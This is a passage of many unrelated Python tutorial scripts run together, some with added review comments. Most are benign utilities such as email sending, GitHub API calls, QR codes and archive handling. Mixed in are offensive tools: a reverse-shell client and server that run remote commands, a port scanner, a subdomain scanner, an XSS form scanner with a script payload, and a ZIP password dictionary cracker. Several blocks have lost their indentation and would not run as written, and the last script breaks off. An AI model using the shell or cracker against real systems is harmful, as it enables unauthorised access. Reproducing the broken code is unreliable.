    # creates a new socket
    s = socket.socket()
    # set the timeout BEFORE connecting: in the original it was set after
    # connect(), where it had no effect on the connection attempt at all
    s.settimeout(0.2)
    try:
        # tries to connect to host using that port
        s.connect((host, port))
    except:
        # cannot connect, port is closed
        return False
    else:
        # the connection was established, port is open!
        return True
    finally:
        # always release the socket (the original leaked one per call)
        s.close()
# get the host from the user
host = input("Enter the host:")
# iterate over ports, from 1 to 1024
for port in range(1, 1025):
if is_port_open(host, port):
print(f"{GREEN}[+] {host}:{port} is open {RESET}")
else:
print(f"{GRAY}[!] {host}:{port} is closed {RESET}", end="\r")
import socket
import subprocess
import sys
SERVER_HOST = sys.argv[1]
SERVER_PORT = 5003
BUFFER_SIZE = 1024
# create the socket object
s = socket.socket()
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))
# receive the greeting message
message = s.recv(BUFFER_SIZE).decode()
print("Server:", message)
while True:
# receive the command from the server
command = s.recv(BUFFER_SIZE).decode()
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# execute the command and retrieve the results
output = subprocess.getoutput(command)
# send the results back to the server
s.send(output.encode())
# close client connection
s.close()
import socket
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5003
BUFFER_SIZE = 1024
# create a socket object
s = socket.socket()
# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
# make the PORT reusable
# when you run the server multiple times in Linux, Address already in use error will raise
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
# just sending a message, for demonstration purposes
message = "Hello and Welcome".encode()
client_socket.send(message)
while True:
# get the command from prompt
command = input("Enter the command you wanna execute:")
# send the command to the client
client_socket.send(command.encode())
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# retrieve command results
results = client_socket.recv(BUFFER_SIZE).decode()
# print them
print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()
import cv2
import numpy as np
import os
def to_bin(data):
    """Return the 8-bit binary string representation of *data*.

    - str: one concatenated bit-string ("a" -> "01100001")
    - bytes / numpy array: a list of per-element 8-bit strings
    - int / numpy uint8: a single 8-character bit-string
    Raises TypeError for anything else.
    """
    if isinstance(data, str):
        return "".join(format(ord(ch), "08b") for ch in data)
    if isinstance(data, (bytes, np.ndarray)):
        return [format(item, "08b") for item in data]
    if isinstance(data, (int, np.uint8)):
        return format(data, "08b")
    raise TypeError("Type not supported.")
def encode(image_name, secret_data):
    """Hide *secret_data* (str) in the least-significant bits of an image.

    Reads the image at *image_name*, writes one payload bit into the LSB of
    each colour channel, and returns the modified image array.
    Raises ValueError when the image cannot hold the payload plus the
    5-byte "=====" stop marker.
    """
    # read the image
    image = cv2.imread(image_name)
    # maximum bytes to encode: one bit per channel, 3 channels per pixel
    n_bytes = image.shape[0] * image.shape[1] * 3 // 8
    print("[*] Maximum bytes to encode:", n_bytes)
    # add stopping criteria BEFORE the capacity check; the original checked
    # the bare payload and could overflow by up to 5 bytes
    secret_data += "====="
    if len(secret_data) > n_bytes:
        raise ValueError("[!] Insufficient bytes, need bigger image or less data.")
    print("[*] Encoding data...")
    data_index = 0
    # convert data to binary
    binary_secret_data = to_bin(secret_data)
    # size of data to hide
    data_len = len(binary_secret_data)
    for row in image:
        for pixel in row:
            # convert RGB values to binary format
            r, g, b = to_bin(pixel)
            # modify the least significant bit only if there is still data to store
            if data_index < data_len:
                # least significant red pixel bit
                pixel[0] = int(r[:-1] + binary_secret_data[data_index], 2)
                data_index += 1
            if data_index < data_len:
                # least significant green pixel bit
                pixel[1] = int(g[:-1] + binary_secret_data[data_index], 2)
                data_index += 1
            if data_index < data_len:
                # least significant blue pixel bit
                pixel[2] = int(b[:-1] + binary_secret_data[data_index], 2)
                data_index += 1
            if data_index >= data_len:
                # payload fully written: stop scanning pixels
                break
        else:
            # inner loop finished without break -> keep going with next row
            continue
        # inner loop broke -> also leave the row loop (the original kept
        # iterating every remaining row doing nothing)
        break
    return image
def decode(image_name):
    """Extract the hidden text from *image_name*'s least-significant bits.

    Collects one bit per colour channel for every pixel, regroups them into
    bytes, and returns the decoded characters up to (excluding) the
    "=====" stop marker written by encode().
    """
    print("[+] Decoding...")
    # read the image
    image = cv2.imread(image_name)
    binary_data = ""
    for row in image:
        for pixel in row:
            r, g, b = to_bin(pixel)
            # keep only the least-significant bit of each channel
            binary_data += r[-1]
            binary_data += g[-1]
            binary_data += b[-1]
    # split by 8-bits
    all_bytes = [ binary_data[i: i+8] for i in range(0, len(binary_data), 8) ]
    # convert from bits to characters
    decoded_data = ""
    for byte in all_bytes:
        decoded_data += chr(int(byte, 2))
        # stop as soon as the marker appears; the tail of the image is noise
        if decoded_data[-5:] == "=====":
            break
    return decoded_data[:-5]
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Steganography encoder/decoder, this Python scripts encode data within images.")
    parser.add_argument("-t", "--text", help="The text data to encode into the image, this only should be specified for encoding")
    parser.add_argument("-e", "--encode", help="Encode the following image")
    parser.add_argument("-d", "--decode", help="Decode the following image")
    args = parser.parse_args()
    secret_data = args.text
    if args.encode:
        # if the encode argument is specified
        input_image = args.encode
        print("input_image:", input_image)
        # split the absolute path and the file
        path, file = os.path.split(input_image)
        # split the filename and the image extension
        filename, ext = file.split(".")
        # derive the output name from the input name; the original f-string
        # had lost its {filename} placeholder and produced a literal name
        output_image = os.path.join(path, f"{filename}_encoded.{ext}")
        # encode the data into the image
        encoded_image = encode(image_name=input_image, secret_data=secret_data)
        # save the output image (encoded image)
        cv2.imwrite(output_image, encoded_image)
        print("[+] Saved encoded image.")
    if args.decode:
        input_image = args.decode
        # decode the secret data from the image
        decoded_data = decode(input_image)
        print("[+] Decoded data:", decoded_data)
import requests
from threading import Thread
from queue import Queue
q = Queue()
def scan_subdomains(domain):
    """Worker loop: keep pulling subdomain candidates off the shared queue
    and report the ones that answer over HTTP."""
    global q
    while True:
        # next candidate to probe (blocks until one is available)
        candidate = q.get()
        target = f"http://{candidate}.{domain}"
        try:
            # a successful request means the subdomain resolves and responds
            requests.get(target)
            print("[+] Discovered subdomain:", target)
        except requests.ConnectionError:
            pass
        # mark this queue item as processed
        q.task_done()
def main(domain, n_threads, subdomains):
    """Fill the shared queue with *subdomains* and launch *n_threads*
    daemon workers scanning *domain*."""
    global q
    # enqueue every subdomain candidate first
    for name in subdomains:
        q.put(name)
    # spawn the worker pool; daemon threads die when the main thread exits
    for _ in range(n_threads):
        worker = Thread(target=scan_subdomains, args=(domain,), daemon=True)
        worker.start()
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Faster Subdomain Scanner using Threads")
    parser.add_argument("domain", help="Domain to scan for subdomains without protocol (e.g without 'http://' or 'https://')")
    parser.add_argument("-l", "--wordlist", help="File that contains all subdomains to scan, line by line. Default is subdomains.txt",
                        default="subdomains.txt")
    parser.add_argument("-t", "--num-threads", help="Number of threads to use to scan the domain. Default is 10", default=10, type=int)
    args = parser.parse_args()
    domain = args.domain
    wordlist = args.wordlist
    num_threads = args.num_threads
    # one candidate per wordlist line; main() enqueues and starts the workers
    main(domain=domain, n_threads=num_threads, subdomains=open(wordlist).read().splitlines())
    # block until the worker threads have drained the queue
    q.join()
# Single-threaded subdomain scanner: tries every name in subdomains.txt
# against a hard-coded domain and prints the ones that respond over HTTP.
import requests
# the domain to scan for subdomains
domain = "google.com"
# read all subdomains
file = open("subdomains.txt")
# read all content
content = file.read()
# split by new lines
subdomains = content.splitlines()
for subdomain in subdomains:
    # construct the url
    url = f"http://{subdomain}.{domain}"
    try:
        # if this raises an ERROR, that means the subdomain does not exist
        requests.get(url)
    except requests.ConnectionError:
        # if the subdomain does not exist, just pass, print nothing
        pass
    else:
        print("[+] Discovered subdomain:", url)
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
def get_all_forms(url):
    """Fetch *url* and return a list of every <form> tag in its HTML."""
    html = requests.get(url).content
    soup = bs(html, "html.parser")
    return soup.find_all("form")
def get_form_details(form):
    """
    Extract all possible useful information about an HTML form.

    Returns a dict with the form's action URL (lower-cased), HTTP method
    (defaulting to "get") and a list of {"type", "name"} dicts for every
    <input> field.
    """
    details = {}
    # get the form action (target url); a form without an action attribute
    # submits to the current page, so default to "" instead of crashing
    # on None like the original did
    action = form.attrs.get("action", "").lower()
    # get the form method (POST, GET, etc.)
    method = form.attrs.get("method", "get").lower()
    # get all the input details such as type and name
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    # put everything to the resulting dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details
def submit_form(form_details, url, value):
    """
    Submit the form described by *form_details*, filling every text and
    search input with *value*.

    Params:
        form_details (dict): form information from get_form_details()
        url (str): the original URL that contained the form
        value (str): value injected into all text/search inputs
    Returns the HTTP Response after form submission.
    """
    # resolve the action against the page URL in case it is relative
    target_url = urljoin(url, form_details["action"])
    data = {}
    # renamed from `input` to avoid shadowing the builtin
    for field in form_details["inputs"]:
        # replace all text and search values with the probe value
        if field["type"] in ("text", "search"):
            field["value"] = value
        field_name = field.get("name")
        field_value = field.get("value")
        if field_name and field_value:
            # only named fields that carry a value get submitted
            data[field_name] = field_value
    if form_details["method"] == "post":
        return requests.post(target_url, data=data)
    # GET request
    return requests.get(target_url, params=data)
def scan_xss(url):
    """
    Given a url, it prints all XSS vulnerable forms and
    returns True if any is vulnerable, False otherwise
    """
    # get all the forms from the URL
    forms = get_all_forms(url)
    print(f"[+] Detected {len(forms)} forms on {url}.")
    # probe payload; mixed-case tags presumably help bypass naive
    # case-sensitive filters -- TODO confirm intent
    js_script = "<Script>alert('hi')</scripT>"
    # returning value
    is_vulnerable = False
    # iterate over all forms
    for form in forms:
        form_details = get_form_details(form)
        # submit the payload and check whether it is reflected verbatim
        content = submit_form(form_details, url, js_script).content.decode()
        if js_script in content:
            print(f"[+] XSS Detected on {url}")
            print(f"[*] Form details:")
            pprint(form_details)
            is_vulnerable = True
            # won't break because we want to print other available vulnerable forms
    return is_vulnerable
if __name__ == "__main__":
    import sys
    # target URL is the first command-line argument
    url = sys.argv[1]
    print(scan_xss(url))
# Dictionary attack on a password-protected ZIP: tries every word in the
# given wordlist as the archive password until extraction succeeds.
# Usage: script.py <zipfile> <wordlist>
from tqdm import tqdm
import zipfile
import sys
# the password list path you want to use
wordlist = sys.argv[2]
# the zip file you want to crack its password
zip_file = sys.argv[1]
# initialize the Zip File object
zip_file = zipfile.ZipFile(zip_file)
# count the number of words in this wordlist
n_words = len(list(open(wordlist, "rb")))
# print the total number of passwords
print("Total passwords to test:", n_words)
with open(wordlist, "rb") as wordlist:
    for word in tqdm(wordlist, total=n_words, unit="word"):
        try:
            zip_file.extractall(pwd=word.strip())
        except:
            # NOTE(review): a wrong password raises here; this bare except
            # also hides unrelated errors (disk full, bad archive, ...)
            continue
        else:
            print("[+] Password found:", word.decode().strip())
            exit(0)
print("[!] Password not found, try other wordlist.")
# Demo of the Veesp hosting REST API using HTTP basic auth: account details,
# bought services, upgrade options, and starting/stopping a VM.
import requests
from pprint import pprint
# email and password
auth = ("emailexample.com", "ffffffff")
# get the HTTP Response
res = requests.get("https://secure.veesp.com/api/details", auth=auth)
# get the account details
account_details = res.json()
pprint(account_details)
# get the bought services
services = requests.get('https://secure.veesp.com/api/service', auth=auth).json()
pprint(services)
# get the upgrade options
upgrade_options = requests.get('https://secure.veesp.com/api/service/32723/upgrade', auth=auth).json()
pprint(upgrade_options)
# list all bought VMs
all_vms = requests.get("https://secure.veesp.com/api/service/32723/vms", auth=auth).json()
pprint(all_vms)
# stop a VM automatically
stopped = requests.post("https://secure.veesp.com/api/service/32723/vms/18867/stop", auth=auth).json()
print(stopped)
# {'status': True}
# start it again
started = requests.post("https://secure.veesp.com/api/service/32723/vms/18867/start", auth=auth).json()
print(started)
# {'status': True}
import os
import matplotlib.pyplot as plt
def get_size_format(b, factor=1024, suffix="B"):
    """
    Scale bytes to its proper byte format
    e.g:
    1253656 => '1.20MB'
    1253656678 => '1.17GB'
    """
    value = b
    for prefix in ("", "K", "M", "G", "T", "P", "E", "Z"):
        if value < factor:
            return f"{value:.2f}{prefix}{suffix}"
        value /= factor
    # anything past zetta is reported in yotta
    return f"{value:.2f}Y{suffix}"
def get_directory_size(directory):
    """Return the total size of *directory* in bytes, recursing into
    subdirectories. A plain file path yields that file's size; an
    unreadable directory counts as 0."""
    size = 0
    try:
        for entry in os.scandir(directory):
            if entry.is_file():
                # regular file: add its size
                size += entry.stat().st_size
            elif entry.is_dir():
                # subdirectory: recurse
                size += get_directory_size(entry.path)
    except NotADirectoryError:
        # the path was a plain file, not a directory
        return os.path.getsize(directory)
    except PermissionError:
        # no permission to open the folder: treat as empty
        return 0
    return size
def plot_pie(sizes, names):
    """Show a pie chart: one wedge per entry in *sizes*, labelled by *names*,
    with each wedge annotated with its percentage."""
    plt.pie(sizes, labels=names, autopct=lambda pct: f"{pct:.2f}%")
    plt.title("Different Sub-directory sizes in bytes")
    plt.show()
if __name__ == "__main__":
    import sys
    # root folder whose immediate subdirectories will be charted
    folder_path = sys.argv[1]
    directory_sizes = []
    names = []
    # iterate over all the directories inside this path
    for directory in os.listdir(folder_path):
        directory = os.path.join(folder_path, directory)
        # get the size of this directory (folder)
        directory_size = get_directory_size(directory)
        # skip empty/unreadable entries so they don't clutter the chart
        if directory_size == 0:
            continue
        directory_sizes.append(directory_size)
        names.append(os.path.basename(directory) + ": " + get_size_format(directory_size))
    print("[+] Total directory size:", get_size_format(sum(directory_sizes)))
    plot_pie(directory_sizes, names)
import tarfile
from tqdm import tqdm # pip3 install tqdm
def decompress(tar_file, path, members=None):
    """
    Extracts tar_file (gzip-compressed) and puts the members to path.
    If members is None, all members on tar_file will be extracted.
    Shows a progress bar while extracting.
    """
    # context manager guarantees the archive is closed even if an
    # extraction fails midway (the original leaked the handle on error)
    with tarfile.open(tar_file, mode="r:gz") as tar:
        if members is None:
            members = tar.getmembers()
        # progress bar over the members being extracted
        progress = tqdm(members)
        for member in progress:
            tar.extract(member, path=path)
            # set the progress description of the progress bar
            progress.set_description(f"Extracting {member.name}")
def compress(tar_file, members):
    """
    Adds files (members) to a tar_file and gzip-compresses it,
    showing a progress bar.
    """
    # open file for gzip compressed writing; the context manager closes it
    # even if adding a member raises (the original leaked the handle then)
    with tarfile.open(tar_file, mode="w:gz") as tar:
        # progress bar over the members being added
        progress = tqdm(members)
        for member in progress:
            # add file/folder/link to the tar file (compress)
            tar.add(member)
            # set the progress description of the progress bar
            progress.set_description(f"Compressing {member}")
# compress("compressed.tar.gz", ["test.txt", "test_folder"])
# decompress("compressed.tar.gz", "extracted")
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="TAR file compression/decompression using GZIP.")
    parser.add_argument("method", help="What to do, either 'compress' or 'decompress'")
    parser.add_argument("-t", "--tarfile", help="TAR file to compress/decompress, if it isn't specified for compression, the new TAR file will be named after the first file to compress.")
    parser.add_argument("-p", "--path", help="The folder to compress into, this is only for decompression. Default is '.' (the current directory)", default="")
    parser.add_argument("-f", "--files", help="File(s),Folder(s),Link(s) to compress/decompress separated by ','.")
    args = parser.parse_args()
    method = args.method
    tar_file = args.tarfile
    path = args.path
    files = args.files
    # split by ',' to convert into a list (None when -f wasn't given)
    files = files.split(",") if isinstance(files, str) else None
    if method.lower() == "compress":
        if not files:
            print("Files to compress not provided, exiting...")
            exit(1)
        elif not tar_file:
            # take the name of the first file
            tar_file = f"{files[0]}.tar.gz"
        compress(tar_file, files)
    elif method.lower() == "decompress":
        if not tar_file:
            print("TAR file to decompress is not provided, nothing to do, exiting...")
            exit(2)
        decompress(tar_file, path, files)
    else:
        print("Method not known, please use 'compress/decompress'.")
# Send a simple HTML email through Gmail's SMTP server over STARTTLS.
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
# FIX: email.mime.audio exports MIMEAudio, not MIME -- the original
# `from email.mime.audio import MIME` raised ImportError at startup
from email.mime.audio import MIMEAudio
# your credentials
email = "emailexample.com"
password = "password"
# the sender's email
FROM = "emailexample.com"
# the receiver's email
TO = "toexample.com"
# the subject of the email (subject)
subject = "Just a subject"
# initialize the message we wanna send
msg = MIMEMultipart()
# set the sender's email
msg["From"] = FROM
# set the receiver's email
msg["To"] = TO
# set the subject
msg["Subject"] = subject
# set the body of the email as HTML
text = MIMEText("This email is sent using <b>Python</b> !", "html")
# attach this body to the email
msg.attach(text)
# initialize the SMTP server
server = smtplib.SMTP("smtp.gmail.com", 587)
# connect to the SMTP server as TLS mode (secure) and send EHLO
server.starttls()
# login to the account using the credentials
server.login(email, password)
# send the email
server.sendmail(FROM, TO, msg.as_string())
# terminate the SMTP session
server.quit()
# Run a local BASH script on a remote Linux host over SSH (paramiko).
import paramiko
import argparse
parser = argparse.ArgumentParser(description="Python script to execute BASH scripts on Linux boxes remotely.")
parser.add_argument("host", help="IP or domain of SSH Server")
parser.add_argument("-u", "--user", required=True, help="The username you want to access to.")
parser.add_argument("-p", "--password", required=True, help="The password of that user")
parser.add_argument("-b", "--bash", required=True, help="The BASH script you wanna execute")
args = parser.parse_args()
hostname = args.host
username = args.user
password = args.password
bash_script = args.bash
# initialize the SSH client
client = paramiko.SSHClient()
# add to known hosts (accepts unknown host keys automatically)
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    client.connect(hostname=hostname, username=username, password=password)
except:
    # NOTE(review): bare except hides the actual failure reason
    # (auth vs network); consider catching paramiko exceptions explicitly
    print("[!] Cannot connect to the SSH Server")
    exit()
# read the BASH script content from the file
bash_script = open(bash_script).read()
# execute the BASH script
stdin, stdout, stderr = client.exec_command(bash_script)
# read the standard output and print it
print(stdout.read().decode())
# print errors if there are any
err = stderr.read().decode()
if err:
    print(err)
# close the connection
client.close()
# Run a fixed list of shell commands on a remote host over SSH (paramiko)
# and print each command's stdout/stderr.
import paramiko
hostname = "192.168.1.101"
username = "test"
password = "abc123"
commands = [
    "pwd",
    "id",
    "uname -a",
    "df -h"
]
# initialize the SSH client
client = paramiko.SSHClient()
# add to known hosts (accepts unknown host keys automatically)
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    client.connect(hostname=hostname, username=username, password=password)
except:
    # NOTE(review): bare except hides the actual failure reason
    print("[!] Cannot connect to the SSH Server")
    exit()
# execute the commands
for command in commands:
    print("="*50, command, "="*50)
    stdin, stdout, stderr = client.exec_command(command)
    print(stdout.read().decode())
    err = stderr.read().decode()
    if err:
        print(err)
client.close()
# Stream-download a file from a URL with a byte-accurate progress bar.
from tqdm import tqdm
import requests
import sys
# the url of file you want to download, passed from command line arguments
url = sys.argv[1]
# read 1024 bytes every time
buffer_size = 1024
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size (0 when the server omits Content-Length)
file_size = int(response.headers.get("Content-Length", 0))
# get the file name from the last URL path segment
filename = url.split("/")[-1]
# progress bar, changing the unit to bytes instead of iteration (default by tqdm);
# the original description f-string had lost its {filename} placeholder
progress = tqdm(response.iter_content(buffer_size), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
    for data in progress:
        # write data read to the file
        f.write(data)
        # update the progress bar manually
        progress.update(len(data))
# Generate a QR code image from command-line text.
# Usage: script.py <data> <output-image>
import qrcode
import sys
data = sys.argv[1]
filename = sys.argv[2]
# generate qr code
img = qrcode.make(data)
# save img to a file
img.save(filename)
# Decode a QR code from an image file and draw its bounding box on screen.
# Usage: script.py <image>
import cv2
import sys
filename = sys.argv[1]
# read the QRCODE image
img = cv2.imread(filename)
# initialize the cv2 QRCode detector
detector = cv2.QRCodeDetector()
# detect and decode
data, bbox, straight_qrcode = detector.detectAndDecode(img)
# if there is a QR code
if bbox is not None:
    print(f"QRCode data:\n{data}")
    # display the image with lines
    # length of bounding box
    n_lines = len(bbox)
    for i in range(n_lines):
        # draw all lines (wrap around with modulo to close the polygon)
        point1 = tuple(bbox[i][0])
        point2 = tuple(bbox[(i+1) % n_lines][0])
        cv2.line(img, point1, point2, color=(255, 0, 0), thickness=2)
# display the result until a key is pressed
cv2.imshow("img", img)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Live QR-code scanner: reads webcam frames, draws the detected code's
# bounding box and prints its data; press 'q' to quit.
import cv2
# initalize the cam (device 0)
cap = cv2.VideoCapture(0)
# initialize the cv2 QRCode detector
detector = cv2.QRCodeDetector()
while True:
    _, img = cap.read()
    # detect and decode
    data, bbox, _ = detector.detectAndDecode(img)
    # check if there is a QRCode in the image
    if bbox is not None:
        # display the image with lines
        for i in range(len(bbox)):
            # draw all lines (modulo closes the polygon)
            cv2.line(img, tuple(bbox[i][0]), tuple(bbox[(i+1) % len(bbox)][0]), color=(255, 0, 0), thickness=2)
        if data:
            print("[+] QR Code detected, data:", data)
    # display the result
    cv2.imshow("img", img)
    if cv2.waitKey(1) == ord("q"):
        break
# release the camera and close the window
cap.release()
cv2.destroyAllWindows()
# PyGithub demo: create a file in a repository, then delete it again.
from github import Github
# your github account credentials
username = "username"
password = "password"
# initialize github object
g = Github(username, password)
# searching for my repository (first search hit)
repo = g.search_repositories("pythoncode tutorials")[0]
# create a file and commit n push
repo.create_file("test.txt", "commit message", "content of the file")
# delete that created file (needs the blob SHA of the current contents)
contents = repo.get_contents("test.txt")
repo.delete_file(contents.path, "remove test.txt", contents.sha)
# Fetch and print a GitHub user's public profile via the REST API.
import requests
from pprint import pprint
# github username
username = "x4nth055"
# url to request
url = f"https://api.github.com/users/{username}"
# make the request and return the json
user_data = requests.get(url).json()
# pretty print JSON data
pprint(user_data)
# get name
name = user_data["name"]
# get blog url if there is
blog = user_data["blog"]
# extract location
location = user_data["location"]
# get email address that is publicly available
email = user_data["email"]
# number of public repositories
public_repos = user_data["public_repos"]
# get number of public gists
public_gists = user_data["public_gists"]
# number of followers
followers = user_data["followers"]
# number of following
following = user_data["following"]
# date of account creation
date_created = user_data["created_at"]
# date of account last update
date_updated = user_data["updated_at"]
# urls
followers_url = user_data["followers_url"]
following_url = user_data["following_url"]
# print all
print("User:", username)
print("Name:", name)
print("Blog:", blog)
print("Location:", location)
print("Email:", email)
print("Total Public repositories:", public_repos)
print("Total Public Gists:", public_gists)
print("Total followers:", followers)
print("Total following:", following)
print("Date Created:", date_created)
print("Date Updated:", date_updated)
import base64
from github import Github
import sys
def print_repo(repo):
    """Print a summary of a PyGithub Repository object: metadata,
    top-level contents, and the license text when one exists."""
    # repository full name
    print("Full name:", repo.full_name)
    # repository description
    print("Description:", repo.description)
    # the date of when the repo was created
    print("Date created:", repo.created_at)
    # the date of the last git push
    print("Date of last push:", repo.pushed_at)
    # home website (if available)
    print("Home Page:", repo.homepage)
    # programming language
    print("Language:", repo.language)
    # number of forks
    print("Number of forks:", repo.forks)
    # number of stars
    print("Number of stars:", repo.stargazers_count)
    print("-"*50)
    # repository content (files & directories)
    print("Contents:")
    for content in repo.get_contents(""):
        print(content)
    try:
        # repo license; the API returns its content base64-encoded
        print("License:", base64.b64decode(repo.get_license().content.encode()).decode())
    except Exception:
        # not every repo has a license; narrowed from a bare `except:`
        # so KeyboardInterrupt/SystemExit are no longer swallowed
        pass
# Github username from the command line
username = sys.argv[1]
# pygithub object; no credentials given, so this uses the public
# (rate-limited) API -- presumably fine for a demo, verify for heavy use
g = Github()
# get that user by username
user = g.get_user(username)
# iterate over all public repositories
for repo in user.get_repos():
    print_repo(repo)
    # separator between repositories
    print("="*100)
from github import Github
import base64
def print_repo(repo):
    """Print a summary of a PyGithub Repository object: metadata,
    top-level contents, and the license text when one exists."""
    # repository full name
    print("Full name:", repo.full_name)
    # repository description
    print("Description:", repo.description)
    # the date of when the repo was created
    print("Date created:", repo.created_at)
    # the date of the last git push
    print("Date of last push:", repo.pushed_at)
    # home website (if available)
    print("Home Page:", repo.homepage)
    # programming language
    print("Language:", repo.language)
    # number of forks
    print("Number of forks:", repo.forks)
    # number of stars
    print("Number of stars:", repo.stargazers_count)
    print("-"*50)
    # repository content (files & directories)
    print("Contents:")
    for content in repo.get_contents(""):
        print(content)
    try:
        # repo license; the API returns its content base64-encoded
        print("License:", base64.b64decode(repo.get_license().content.encode()).decode())
    except Exception:
        # not every repo has a license; narrowed from a bare `except:`
        # so KeyboardInterrupt/SystemExit are no longer swallowed
        pass
# your github account credentials
username = "username"
password = "password"
# initialize github object
g = Github(username, password)
# or use public version
# g = Github()
# search repositories by name
for repo in g.search_repositories("pythoncode tutorials"):
    # print repository details
    print_repo(repo)
    print("="*100)
print("="*100)
print("="*100)
# search by programming language; stop after the first 10 results
for i, repo in enumerate(g.search_repositories("language:python")):
    print_repo(repo)
    print("="*100)
    if i == 9:
        break
# Tour of the stdlib `ipaddress` module: address properties, arithmetic,
# network masks, host/subnet iteration and supernet/overlap queries.
import ipaddress
# initialize an IPv4 Address
ip = ipaddress.IPv4Address("192.168.1.1")
# print True if the IP address is global
print("Is global:", ip.is_global)
# print True if the IP address is Link-local
print("Is link-local:", ip.is_link_local)
# ip.is_reserved
# ip.is_multicast
# next ip address
print(ip + 1)
# previous ip address
print(ip - 1)
# initialize an IPv4 Network
network = ipaddress.IPv4Network("192.168.1.0/24")
# get the network mask
print("Network mask:", network.netmask)
# get the broadcast address
print("Broadcast address:", network.broadcast_address)
# print the number of IP addresses under this network
print("Number of hosts under", str(network), ":", network.num_addresses)
# iterate over all the usable hosts under this network
print("Hosts under", str(network), ":")
for host in network.hosts():
    print(host)
# iterate over the subnets of this network
print("Subnets:")
for subnet in network.subnets(prefixlen_diff=2):
    print(subnet)
# get the supernet of this network
print("Supernet:", network.supernet(prefixlen_diff=1))
# prefixlen_diff: An integer, the amount the prefix length of
# the network should be decreased by. For example, given a
# /24 network and a prefixlen_diff of 3, a supernet with a
# /21 netmask is returned.
# tell if this network is under (or overlaps) 192.168.0.0/16
print("Overlaps 192.168.0.0/16:", network.overlaps(ipaddress.IPv4Network("192.168.0.0/16")))
# Tour of the `keyboard` package: abbreviations, hotkeys, key state,
# synthetic typing, and event record/replay.
import keyboard
# registering a hotkey that replaces one typed text with another
# replaces every "email" followed by a space with my actual email
keyboard.add_abbreviation("email", "rockikzthepythoncode.com")
# invokes a callback everytime a hotkey is pressed
keyboard.add_hotkey("ctrl+alt+p", lambda: print("CTRL+ALT+P Pressed!"))
# check if a ctrl is pressed
print(keyboard.is_pressed('ctrl'))
# press space
keyboard.send("space")
# sends artificial keyboard events to the OS
# simulating the typing of a given text
# setting 0.1 seconds to wait between keypresses to look fancy
keyboard.write("Python Programming is always fun!", delay=0.1)
# record all keyboard clicks until esc is clicked
events = keyboard.record('esc')
# play these events
keyboard.play(events)
# remove all keyboard hooks in use
keyboard.unhook_all()
# fbchat demo: log into Messenger, find the contact with the highest
# message count, and send them a congratulation message.
from fbchat import Client
from fbchat.models import Message, MessageReaction
# facebook user credentials
username = "username.or.email"
password = "password"
# login
client = Client(username, password)
# get 20 users you most recently talked to
users = client.fetchThreadList()
print(users)
# get the detailed informations about these users
detailed_users = [ list(client.fetchThreadInfo(user.uid).values())[0] for user in users ]
# sort by number of messages (descending)
sorted_detailed_users = sorted(detailed_users, key=lambda u: u.message_count, reverse=True)
# print the best friend!
best_friend = sorted_detailed_users[0]
print("Best friend:", best_friend.name, "with a message count of", best_friend.message_count)
# message the best friend!
client.send(Message(
            text=f"Congratulations {best_friend.name}, you are my best friend with {best_friend.message_count} messages!"
        ),
        thread_id=best_friend.uid)
# get all users you talked to in messenger in your account
all_users = client.fetchAllUsers()
print("You talked with a total of", len(all_users), "users!")
# let's logout
client.logout()
# Tour of the `mouse` package: clicks, position, dragging, listeners,
# scrolling, and event record/replay.
import mouse
# left click
mouse.click('left')
# right click
mouse.click('right')
# middle click
mouse.click('middle')
# get the position of mouse
print(mouse.get_position())
# In [12]: mouse.get_position()
# Out[12]: (714, 488)
# presses but doesn't release
mouse.hold('left')
# mouse.press('left')
# drag from (0, 0) to (100, 100) relatively with a duration of 0.1s
mouse.drag(0, 0, 100, 100, absolute=False, duration=0.1)
# whether a button is clicked
print(mouse.is_pressed('right'))
# move 100 right & 100 down
mouse.move(100, 100, absolute=False, duration=0.2)
# make a listener when left button is clicked
mouse.on_click(lambda: print("Left Button clicked."))
# make a listener when right button is clicked
mouse.on_right_click(lambda: print("Right Button clicked."))
# remove the listeners when you want
mouse.unhook_all()
# scroll down
mouse.wheel(-1)
# scroll up
mouse.wheel(1)
# record until you click right
events = mouse.record()
# replay these events (dropping the final right-click that stopped recording)
mouse.play(events[:-1])
import pickle
# Pickle round-trip demo: dump a list to disk, load it back, and show the
# copy is equal but not the same object.
# define any Python data structure including lists, sets, tuples, dicts, etc.
l = list(range(10000))
# save it to a file
with open("list.pickle", "wb") as file:
    pickle.dump(l, file)
# load it again
with open("list.pickle", "rb") as file:
    unpickled_l = pickle.load(file)
print("unpickled_l == l: ", unpickled_l == l)
print("unpickled l is l: ", unpickled_l is l)
import pickle
class Person:
    """Simple record describing a person; used to demonstrate pickling
    of custom class instances."""

    def __init__(self, first_name, last_name, age, gender):
        self.first_name = first_name
        self.last_name = last_name
        self.age = age
        self.gender = gender

    def __str__(self):
        # human-readable one-line summary
        full_name = f"{self.first_name} {self.last_name}"
        return f"<Person name={full_name}, age={self.age}, gender={self.gender}>"
# Round-trip a custom object through pickle and show both print identically.
p = Person("John", "Doe", 99, "Male")
# save the object
with open("person.pickle", "wb") as file:
    pickle.dump(p, file)
# load the object
